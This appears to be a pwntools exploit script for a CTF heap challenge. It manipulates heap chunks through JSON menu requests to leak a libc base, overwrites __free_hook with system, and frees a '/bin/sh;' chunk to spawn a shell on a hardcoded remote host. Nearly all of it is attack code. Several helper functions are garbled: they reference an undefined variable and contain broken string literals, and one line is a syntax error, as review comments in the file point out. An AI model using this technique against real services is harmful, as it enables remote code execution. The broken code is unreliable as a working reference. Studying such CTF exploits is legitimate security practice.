from
pwn
import
*
# Thin aliases over the module-level pwntools tube `io`, which start()
# assigns further down the file.  Each one just forwards to the tube.
def s(data):
    """Send `data` on the tube as-is."""
    return io.send(data)


def sa(delim, data):
    """Send `data` after `str(delim)` has been received."""
    return io.sendafter(str(delim), data)


def sl(data):
    """Send `data` followed by a newline."""
    return io.sendline(data)


def sla(delim, data):
    """Send `data` plus newline after `str(delim)` has been received."""
    return io.sendlineafter(str(delim), data)


def r(num):
    """Receive up to `num` bytes."""
    return io.recv(num)


def rl():
    """Receive a single line."""
    return io.recvline()


def ru(delims, drop=True):
    """Receive until `delims`; `drop` is forwarded unchanged to recvuntil."""
    return io.recvuntil(delims, drop)


def itr():
    """Hand the tube over to the terminal."""
    return io.interactive()


def uu32(data):
    """Unpack a 32-bit value with u32, right-padding short input to 4 bytes with NULs."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Unpack a 64-bit value with u64, right-padding short input to 8 bytes with NULs."""
    return u64(data.ljust(8, b'\x00'))


def ls(data):
    """Log `data` at success level."""
    return log.success(data)


def lss(s):
    """Log the hex value of the expression named by `s`.

    `s` goes straight into eval(), so it must only ever be a literal written
    in this file (which is how the call sites below use it) -- never anything
    that came off the wire.
    """
    return log.success('\033[1;31;40m%s --> 0x%x \033[0m' % (s, eval(s)))


# Global pwntools settings: 64-bit target, verbose tube logging, and a tmux
# split for the debugger window.
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h', '-l', '130']
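def start(binary, argv=None, *a, **kw):
    """Open the tube selected by the pwntools command-line ARGS.

    With GDB set the binary runs under gdb using the module-level
    `gdbscript`; with RE set a connection to the remote instance is
    returned; otherwise the binary is started as a local process.
    `argv` is appended after `binary`; any further positional or
    keyword arguments are forwarded to the tube constructor.
    """
    # `None` stands in for the mutable `[]` default so each call gets a
    # fresh list rather than one shared across invocations.
    argv = [] if argv is None else argv
    if args.GDB:
        return gdb.debug([binary] + argv, gdbscript=gdbscript, *a, **kw)
    if args.RE:
        return remote('39.106.48.123', 30155)
    return process([binary] + argv, *a, **kw)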
# Target selection.  `binary` is the local challenge executable; `libelf`
# may name an explicit libc to load instead of the one pwntools resolves
# from the binary.
binary = './pwn'
libelf = ''
# elf/rop/libc are only bound when `binary` is non-empty; `libc` is used
# unconditionally further down, so an empty `binary` would NameError there.
if (binary != ''): elf = ELF(binary); rop = ROP(binary); libc = elf.libc
if (libelf != ''): libc = ELF(libelf)
# NOTE(review): the template string that should precede `.format` is
# missing (most likely lost when this file was extracted); as written the
# line is a syntax error.  Restore the original gdb script literal.
gdbscript = .format(**locals())
io = start(binary)
def add(idx=0, l=0, meg='A'):
    """Answer one 'Please input:' prompt with a JSON request sent via sl().

    add/rm/show/edit in this file share this exact body.
    """
    ru('Please input:')
    # NOTE(review): `f` is not defined anywhere in view.  Judging by the
    # literal requests built near the end of the file, this was probably an
    # f-string interpolating idx, l and meg whose body was lost in
    # extraction -- confirm against the original source.  As written, the
    # three parameters are never used.  `json` also shadows the stdlib
    # module name.
    json = '{' + f + '}'
    # NOTE(review): the replace() arguments below are garbled (unterminated
    # quotes); presumably newline/whitespace stripping before sending.
    json = json.replace('\n','
    ').replace('
    ','
    ')
    sl(json)
def rm(idx=0, l=0, meg='A'):
    """Answer one 'Please input:' prompt with a JSON request sent via sl().

    Body is identical to add/show/edit in this file.
    """
    ru('Please input:')
    # NOTE(review): `f` is undefined in view; most likely an f-string whose
    # body (interpolating idx, l, meg) was lost in extraction -- confirm
    # against the original.  The parameters are otherwise unused.
    json = '{' + f + '}'
    # NOTE(review): replace() arguments are garbled (unterminated quotes).
    json = json.replace('\n','
    ').replace('
    ','
    ')
    sl(json)
def show(idx=0, l=0, meg='A'):
    """Answer one 'Please input:' prompt with a JSON request sent via sl().

    Body is identical to add/rm/edit in this file.
    """
    ru('Please input:')
    # NOTE(review): `f` is undefined in view; most likely an f-string whose
    # body (interpolating idx, l, meg) was lost in extraction -- confirm
    # against the original.  The parameters are otherwise unused.
    json = '{' + f + '}'
    # NOTE(review): replace() arguments are garbled (unterminated quotes).
    json = json.replace('\n','
    ').replace('
    ','
    ')
    sl(json)
def edit(idx=0, l=0, meg='A'):
    """Answer one 'Please input:' prompt with a JSON request sent via sl().

    Body is identical to add/rm/show in this file.
    """
    ru('Please input:')
    # NOTE(review): `f` is undefined in view; most likely an f-string whose
    # body (interpolating idx, l, meg) was lost in extraction -- confirm
    # against the original.  The parameters are otherwise unused.
    json = '{' + f + '}'
    # NOTE(review): replace() arguments are garbled (unterminated quotes).
    json = json.replace('\n','
    ').replace('
    ','
    ')
    sl(json)
# --- interaction sequence ---------------------------------------------------
# Every constant below (the chunk sizes, the 736/0xa lengths, the p16 value,
# the 2018115 offset) is specific to this challenge binary and the libc it
# was written against; only libc_base is derived at run time.  The order of
# calls is load-bearing and is not safe to rearrange.
add(0, 0x78, "I" * 0x28)
add(1, 0x3f8, "A" * 0x28)
add(2, 0x78, "I" * 0x28)
add(3, 0x78, "I" * 0x28)
edit(0, 736 + 0xa, b'Y' * (736 + 8) + p16(0x401 + 0x50 * 5 + 0x20 * 5))
rm(1)
add(4, 16, '')
edit(4, 1, b"C")
show(4)
ru('message:')
# Six bytes are read back, NUL-padded to eight by uu64, then rebased with a
# hard-coded offset that is only valid for that one libc build.
libc_base = uu64(r(6)) - 2018115
lss('libc_base')
rm(2)
rm(3)
ru('Please input:')
# These two requests are assembled by hand as bytes (unlike the helpers
# above) so the packed address can be embedded verbatim.  `json` shadows
# the stdlib module name; nothing in view depends on that module.
json = b'{"choice":"modify","index":3, "length": 9, "message":"' + p64(libc_base + libc.sym['__free_hook'])[:6] + b'"}'
# Spaces kept in the literal for readability are stripped before sending.
json = json.replace(b' ', b'')
print(json)  # debug echo of the exact bytes that go on the wire
sl(json)
add(5, 0x78, '/bin/sh;')
ru('Please input:')
json = b'{"choice":"new","index":6, "length": 120, "message":"' + p64(libc_base + libc.sym['system'])[:6] + b'"}'
json = json.replace(b' ', b'')
print(json)
sl(json)
rm(5)
io.interactive()